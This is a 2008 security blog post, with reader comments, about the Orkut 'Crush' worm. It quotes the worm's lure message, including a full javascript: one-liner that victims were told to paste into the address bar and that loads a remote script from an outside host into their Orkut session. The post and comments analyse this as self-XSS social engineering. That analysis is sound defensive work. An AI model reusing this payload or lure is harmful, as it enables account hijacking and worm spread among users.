Orkut “Crush” Worm
I’m a little behind the times, catching up on my email, but I thought I’d post this first since it’s probably some of the most interesting stuff. Keyshor just sent me an interesting snippet related to another Orkut worm that I’m affectionately calling “Crush” given the mode of transport, which is the Orkut crush. Here’s Keyshor’s email (cleaned up slightly):
This is the vulnerable scrapFind out who has crush on u….
wait 4 few minutes after pressing enter
Author–> Coder http://www.orkut.com/Profile.aspx?uid=12437994075478369725>:)
Just copy the JavaScript, paste it in your address bar and PRESS ENTER*javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://002292.googlepages.com/crush.js';void(0)*
Trust me, ITS WORKING!!!
The site is down now, but I threw up the JavaScript source in the list of XSS worms so people could check it out. I was able to pull another version that was still alive here. It also appears that it may at least at one point have been a greasemonkey plugin by the headers, which is an interesting way to debug your DHTML malware, I suppose. Anyway, great snippet for those who want to do some more analysis.
February 28th, 2008 at 6:05 pm
Now, I don’t know how successful this was, but I’m going to assume it hit a fair few people.
So now we’ve finally reached the equivalent of those mass mailing worms where users have to download trojans; I honestly hope we don’t end up with an anti-javascript-virus solution which tries to match all the websites you view to common ‘malware’ such as this…
On the other hand if these ever get prolific, I wouldn’t be surprised if we did…
Protecting users from themselves seems to be the name of the game these days.
February 28th, 2008 at 7:20 pm
Viewing the XSS worm list makes Avast go insane. What’s going on? I’m going to have to use w3m to view that page. Agh. I’m on a work computer, thank god.
February 29th, 2008 at 2:02 am
LOL
This reminds me of that manual virus joke…
February 29th, 2008 at 5:50 am
Also available here:
http://userscripts.org/scripts/review/23071?format=txt
March 2nd, 2008 at 4:05 pm
“Just copy the JavaScript, paste it in your address bar and PRESS ENTER”… Since it’s in an XSS worms list, where is the XSS, may I ask?
March 3rd, 2008 at 8:11 am
@blah - funny, I thought you’d ask where the worm is, not where the XSS is, since the worm question is the only part that I think is pretty non-straight forward.
The XSS part is where you type something into your browser which requests an inclusion of a script from another domain and pulls it into the DOM for the page in question, which in this case is Orkut. Now that we all understand what XSS is….
I think this kind of XSS is pretty un-interesting in the same way I think Phishing is un-interesting but if people are still getting owned by it, it’s definitely worth mentioning, don’t you?
March 4th, 2008 at 7:50 am
Hah!
Please take a hammer and smash it into random parts of your computer, then proceed to mail me your credit card number. trust me, IT’S WORKING!